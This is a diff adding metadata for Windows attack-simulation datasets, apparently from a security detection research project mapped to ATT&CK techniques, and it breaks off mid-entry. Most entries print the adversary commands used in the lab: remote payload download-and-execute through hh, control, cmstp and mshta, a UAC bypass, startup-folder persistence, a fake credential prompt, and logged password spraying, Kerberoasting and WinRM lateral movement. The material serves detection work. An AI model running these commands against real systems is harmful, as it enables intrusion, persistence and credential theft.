+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md#atomic-test-1---process-injection-via-mavinjectexe"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:51.202376+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201020013208.yaml": {
+        "title": "UI Prompt For Credentials Function",
+        "id": "SDWIN-201020013208",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/20",
+        "modification_date": "2020/10/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.2b162bfd-0928-4d4c-9ec3-4d9f88374b52"
+        ],
+        "description": "This dataset represents adversaries leveraging functions such as CredUIPromptForCredentials to create and display a configurable dialog box that accepts credentials information from a user.",
+        "attack_mappings": [
+            {
+                "technique": "T1056",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0006",
+                    "TA0009"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_input_capture_promptforcreds.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "powershell",
+                    "module": "powershell",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "PS > $cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)\nPS > write-warning $cred.GetNetworkCredential().Password\nWARNING: testing\nPS >"
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password",
+            "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:51.406375+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201021001911.yaml": {
+        "title": "Netsh Open FW Proxy Ports",
+        "id": "SDWIN-201021001911",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/21",
+        "modification_date": "2020/10/21",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.15e57006-79dd-46df-9bf9-31bc24fb5a80"
+        ],
+        "description": "This dataset represents adversaries modifying the local FW by opening port for proxy.",
+        "attack_mappings": [
+            {
+                "technique": "T1562",
+                "sub-technique": "004",
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_netsh_fw_mod_open_ports.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "cmd",
+                    "module": "cmd",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-4---opening-ports-for-proxy---hardrain"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "netsh advfirewall firewall add rule name=\"atomic testing\" action=allow dir=in protocol=TCP localport=450\nnetsh advfirewall firewall delete rule name=\"atomic testing\" protocol=TCP localport=450 >nul 2>&1"
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-4---opening-ports-for-proxy---hardrain"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:51.610377+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201021204544.yaml": {
+        "title": "Service Modification Fax",
+        "id": "SDWIN-201021204544",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/21",
+        "modification_date": "2020/10/21",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.ed366cde-7d12-49df-a833-671904770b9f"
+        ],
+        "description": "This dataset represents adversaries modifying a local service to execute powershell.",
+        "attack_mappings": [
+            {
+                "technique": "T1543",
+                "sub-technique": "003",
+                "tactics": [
+                    "TA0003",
+                    "TA0004"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/privilege_escalation/host/cmd_service_mod_fax.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "cmd",
+                    "module": "cmd",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md#atomic-test-1---modify-fax-service-to-run-powershell"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "sc config Fax binPath= \"C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -c \\\"write-host 'T1543.003 Test'\\\"\"\nsc start Fax"
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md#atomic-test-1---modify-fax-service-to-run-powershell"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:51.815376+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201021232814.yaml": {
+        "title": "Internet Explorer Version Discovery",
+        "id": "SDWIN-201021232814",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/21",
+        "modification_date": "2020/10/21",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.68981660-6670-47ee-a5fa-7e74806420a4"
+        ],
+        "description": "This dataset represents threat actors querying HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer to get the version of internet explorer installed on the system.",
+        "attack_mappings": [
+            {
+                "technique": "T1518",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0007"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/cmd_discover_iexplorer_version_registry.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "cmd",
+                    "module": "cmd",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md#atomic-test-1---find-and-display-internet-explorer-browser-version"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "reg query \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\" /v svcVersion"
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md#atomic-test-1---find-and-display-internet-explorer-browser-version"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:52.021376+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201022002145.yaml": {
+        "title": "HH Execution of Local Compiled HTML Payload",
+        "id": "SDWIN-201022002145",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/22",
+        "modification_date": "2020/10/22",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.5cb87818-0d7c-4469-b7ef-9224107aebe8"
+        ],
+        "description": "This dataset represents threat actors executing local compiled HTML Help payloads via hh.exe.",
+        "attack_mappings": [
+            {
+                "technique": "T1218",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_hh_local_html_payload.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "powershell",
+                    "module": "powershell",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md#atomic-test-1---compiled-html-help-local-payload"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm\" -OutFile C:\\ProgramData\\T1218.001.chm\nhh.exe C:\\ProgramData\\T1218.001.chm"
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md#atomic-test-1---compiled-html-help-local-payload"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:52.209375+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201022013121.yaml": {
+        "title": "Control Panel Execution",
+        "id": "SDWIN-201022013121",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/22",
+        "modification_date": "2020/10/22",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.037e9d8a-9e46-4255-8b33-2ae3b545ca6f"
+        ],
+        "description": "This dataset represents threat actors leveraging control.exe to execute a .cpl file to proxy execute another payload (i.e. calc).",
+        "attack_mappings": [
+            {
+                "technique": "T1218",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_control_panel_execution.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "powershell",
+                    "module": "powershell",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md#atomic-test-1---control-panel-items"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl\" -OutFile C:\\ProgramData\\calc.cpl\ncontrol.exe C:\\ProgramData\\calc.cpl"
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md#atomic-test-1---control-panel-items"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:52.398375+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201022015432.yaml": {
+        "title": "CMSTP Proxy Execution",
+        "id": "SDWIN-201022015432",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/22",
+        "modification_date": "2020/10/22",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.748cb4f6-2fb3-4e97-b7ad-b22635a09ab0"
+        ],
+        "description": "This dataset represents threat actors leveraging CMSTP to execute an Inf file to proxy execute other malicious commands (i.e. cmd.exe). (Embedding commands in the RunPreSetupCommandsSection of the INF file).",
+        "attack_mappings": [
+            {
+                "technique": "T1218",
+                "sub-technique": "003",
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_cmstp_execution_bypassuac.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "powershell",
+                    "module": "powershell",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md#atomic-test-2---cmstp-executing-uac-bypass"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf\" -OutFile C:\\ProgramData\\T1218.003_uacbypass.inf\ncmstp.exe /s C:\\ProgramData\\T1218.003_uacbypass.inf /au"
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md#atomic-test-2---cmstp-executing-uac-bypass"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:52.597375+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201022022144.yaml": {
+        "title": "Mshta Javascript GetObject Sct",
+        "id": "SDWIN-201022022144",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/22",
+        "modification_date": "2020/10/22",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.1483fab9-4f52-4217-a9ce-daa9d7747cae"
+        ],
+        "description": "This dataset represents threat actors leveraging mshta.exe to proxy execute malicious .sct files via Javascript.",
+        "attack_mappings": [
+            {
+                "technique": "T1218",
+                "sub-technique": "005",
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_mshta_javascript_getobject_sct.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "Cmd",
+                    "module": "Cmd",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-1---mshta-executes-javascript-scheme-fetch-remote-payload-with-getobject"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();"
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-1---mshta-executes-javascript-scheme-fetch-remote-payload-with-getobject"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:56.431604+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201022025808.yaml": {
+        "title": "Mshta VBScript Execute PowerShell",
+        "id": "SDWIN-201022025808",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/22",
+        "modification_date": "2020/10/22",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.906865c3-e05f-4acc-85c4-fbc185455095"
+        ],
+        "description": "This dataset represents threat actors leveraging mshta.exe to proxy execute malicious powershell commands via vbscript.",
+        "attack_mappings": [
+            {
+                "technique": "T1218",
+                "sub-technique": "005",
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_mshta_vbscript_execute_psh.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "Cmd",
+                    "module": "Cmd",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-2---mshta-executes-vbscript-to-execute-malicious-command"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -command Get-Service sysmon\"\":close\")"
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-2---mshta-executes-vbscript-to-execute-malicious-command"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:56.671949+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201022035214.yaml": {
+        "title": "Mshta HTML Application (HTA) Execution",
+        "id": "SDWIN-201022035214",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/22",
+        "modification_date": "2020/10/22",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.c4b97eeb-5249-4455-a607-59f95485cb45"
+        ],
+        "description": "This dataset represents threat actors leveraging mshta.exe to proxy execute malicious commands via an .hta file.",
+        "attack_mappings": [
+            {
+                "technique": "T1218",
+                "sub-technique": "005",
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_mshta_html_application_execution.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "PowerShell",
+                    "module": "PowerShell",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-3---mshta-executes-remote-html-application-hta"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "$var =Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta\"\n$var.content|out-file \"$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\"\nmshta \"$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\""
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md#atomic-test-3---mshta-executes-remote-html-application-hta"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:56.857604+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201022042947.yaml": {
+        "title": "PurpleSharp Active Directory Playbook I",
+        "id": "SDWIN-201022042947",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g",
+            "Mauricio Velazco @mvelazco"
+        ],
+        "creation_date": "2020/10/22",
+        "modification_date": "2020/10/22",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents threat actors performing a few techniques in Active Directory to brute force passwords, request Kerberos ticket-granting service (TGS) service tickets from all SPNs, test access to remote network shares, and move laterally over Windows Remote Management (WinRM).",
+        "attack_mappings": [
+            {
+                "technique": "T1110",
+                "sub-technique": "003",
+                "tactics": [
+                    "TA0006"
+                ]
+            },
+            {
+                "technique": "T1558",
+                "sub-technique": "003",
+                "tactics": [
+                    "TA0006"
+                ]
+            },
+            {
+                "technique": "T1135",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0007"
+                ]
+            },
+            {
+                "technique": "T1021",
+                "sub-technique": "006",
+                "tactics": [
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/purplesharp_ad_playbook_I.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/purplesharp_ad_playbook_I.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Shire",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "Cmd",
+                    "module": "Cmd",
+                    "script": "https://github.com/mvelazc0/PurpleSharp"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "c:\\Users\\pgustavo\\Downloads>PurpleSharp.exe /t T1110.003,T1558.003,T1135,T1021.006\n10/22/2020 04:29:52 [*]  Starting T1110.003 Simulation on WORKSTATION5\n10/22/2020 04:29:52 [*]  Simulator running from c:\\Users\\pgustavo\\Downloads\\PurpleSharp.exe with PID:7520 as THESHIRE\\pgustavo\n10/22/2020 04:29:52 [*]  Local Domain Brute Force using the LogonUser Win32 API function\n[*] Targeting domain neighbor users\n[*] Using LogonServer MORDORDC.theshire.local for LDAP queries\n[*] Querying for active domain users with badPwdCount <= 3..\n10/22/2020 04:29:53 [*]  Obtained 7 user accounts\n10/22/2020 04:29:53 [*]  Tried to authenticate as lrodriguez (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*]  Tried to authenticate as pgustavo (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*]  Tried to authenticate as sysmonsvc (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*]  Tried to authenticate as sbeavers (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*]  Tried to authenticate as mscott (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*]  Tried to authenticate as pbeesly (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*]  Tried to authenticate as nxlogsvc (NTLM). Error Code:1326\n10/22/2020 04:29:53 [*]  Simulation Finished\n10/22/2020 04:29:53 [*]  Starting T1558.003 Simulation on WORKSTATION5\n10/22/2020 04:29:53 [*]  Simulator running from c:\\Users\\pgustavo\\Downloads\\PurpleSharp.exe with PID:7520 as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*]  Obtained service ticket and hash for SPN Sysmon/theshire.local (sysmonsvc)\n10/22/2020 04:29:54 [*]  Obtained service ticket and hash for SPN Nxlog/theshire.local (nxlogsvc)\n10/22/2020 04:29:54 [*]  Obtained service ticket and hash for SPN Defense/theshire.local (defensesvc)\n10/22/2020 04:29:54 [*]  Obtained service ticket and hash for SPN OTR/theshire.local (otrsvc)\n10/22/2020 04:29:54 [*]  Obtained service ticket and hash for SPN Ring/theshire.local (mordorsvc)\n10/22/2020 04:29:54 [*]  Simulation Finished\n10/22/2020 04:29:54 [*]  Starting T1135 Simulation on WORKSTATION5\n10/22/2020 04:29:54 [*]  Simulator running from c:\\Users\\pgustavo\\Downloads\\PurpleSharp.exe with PID:7520 as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*]  Using the Win32 API NetShareEnum function to execute this technique\n[*] Obtaining domain neighbor targets ...\n[*] Using MORDORDC.theshire.local for LDAP queries\n10/22/2020 04:29:54 [*]  Obtained 4 target computers\n10/22/2020 04:29:54 [*]  Successfully enumerated shares on WEC.theshire.local as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*]  Successfully enumerated shares on WORKSTATION6.theshire.local as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*]  Successfully enumerated shares on MORDORDC.theshire.local as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*]  Successfully enumerated shares on WORKSTATION7.theshire.local as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*]  Simulation Finished\n10/22/2020 04:29:54 [*]  Starting T1021.006 Simulation on WORKSTATION5\n10/22/2020 04:29:54 [*]  Simulator running from c:\\Users\\pgustavo\\Downloads\\PurpleSharp.exe with PID:7520 as THESHIRE\\pgustavo\n10/22/2020 04:29:54 [*]  Using the System.Management.Automation .NET namespace to execute this technique\n10/22/2020 04:29:54 [*]  Querying LDAP for random targets...\n[*] Obtaining domain neighbor targets ...\n[*] Using MORDORDC.theshire.local for LDAP queries\n10/22/2020 04:29:54 [*]  Obtained 4 target computers\n10/22/2020 04:29:59 [*]  Started a process using WinRM on WORKSTATION7\n10/22/2020 04:30:00 [*]  Started a process using WinRM on WEC\n10/22/2020 04:30:00 [*]  Started a process using WinRM on WORKSTATION6\n10/22/2020 04:30:01 [*]  Started a process using WinRM on MORDORDC\n10/22/2020 04:30:01 [*]  Simulation Finished\n10/22/2020 04:30:01 [*]  Playbook Finished\n\nc:\\Users\\pgustavo\\Downloads>"
+        },
+        "references": [
+            "https://github.com/mvelazc0/PurpleSharp"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:57.051288+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201023020513.yaml": {
+        "title": "Register-CimProvider Execute Dll",
+        "id": "SDWIN-201023020513",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/23",
+        "modification_date": "2020/10/23",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents threat actors leveraging Register-Cimprovider to execute a malicious Dll.",
+        "attack_mappings": [
+            {
+                "technique": "T1218",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_register_cimprovider_execute_dll.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "PowerShell",
+                    "module": "PowerShell",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md#atomic-test-3---register-cimprovider---execute-evil-dll"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "PS >Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll\" -OutFile C:\\ProgramData\\T1218-2.dll\nPS > C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path C:\\ProgramData\\T1218-2.dll\n\n'Namespace' is not specified.\n'ProviderName' is not specified.\nFailed to load provider 'C:\\ProgramData\\T1218-2.dll'. Failure code 0x8007045A.\n\nTry 'Register-CimProvider.exe -help' for help."
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md#atomic-test-3---register-cimprovider---execute-evil-dll"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:59.465652+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201023023651.yaml": {
+        "title": "Bitsadmin Download Malicious File",
+        "id": "SDWIN-201023023651",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/23",
+        "modification_date": "2020/10/23",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "art.3c73d728-75fb-4180-a12f-6712864d7421"
+        ],
+        "description": "This dataset represents threat actors leveraging bitsadmin.exe to download a file.",
+        "attack_mappings": [
+            {
+                "technique": "T1197",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0003",
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_bitsadmin_download_psh_script.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "Cmd",
+                    "module": "Cmd",
+                    "script": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md#atomic-test-1---bitsadmin-download-cmd"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\\bitsadmin1_flag.ps1\n\nDISPLAY: '/Download' TYPE: DOWNLOAD STATE: TRANSFERRED\nPRIORITY: FOREGROUND FILES: 1 / 1 BYTES: 6886 / 6886 (100%)\nTransfer complete."
+        },
+        "references": [
+            "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md#atomic-test-1---bitsadmin-download-cmd"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:59.703461+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201023031210.yaml": {
+        "title": "PurpleSharp PE Injection CreateRemoteThread",
+        "id": "SDWIN-201023031210",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/10/23",
+        "modification_date": "2020/10/23",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents threat actors injecting portable executables (PE) into processes via APIs such asVirtualAllocEx and WriteProcessMemory and running it on the virtual address space of another process via the CreateRemoteThread API.",
+        "attack_mappings": [
+            {
+                "technique": "T1055",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0004",
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/purplesharp_pe_injection_createremotethread.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "Cmd",
+                    "module": "Cmd",
+                    "script": "https://github.com/mvelazc0/PurpleSharp/blob/master/PurpleSharp/Simulations/DefenseEvasion.cs#L216-L238"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
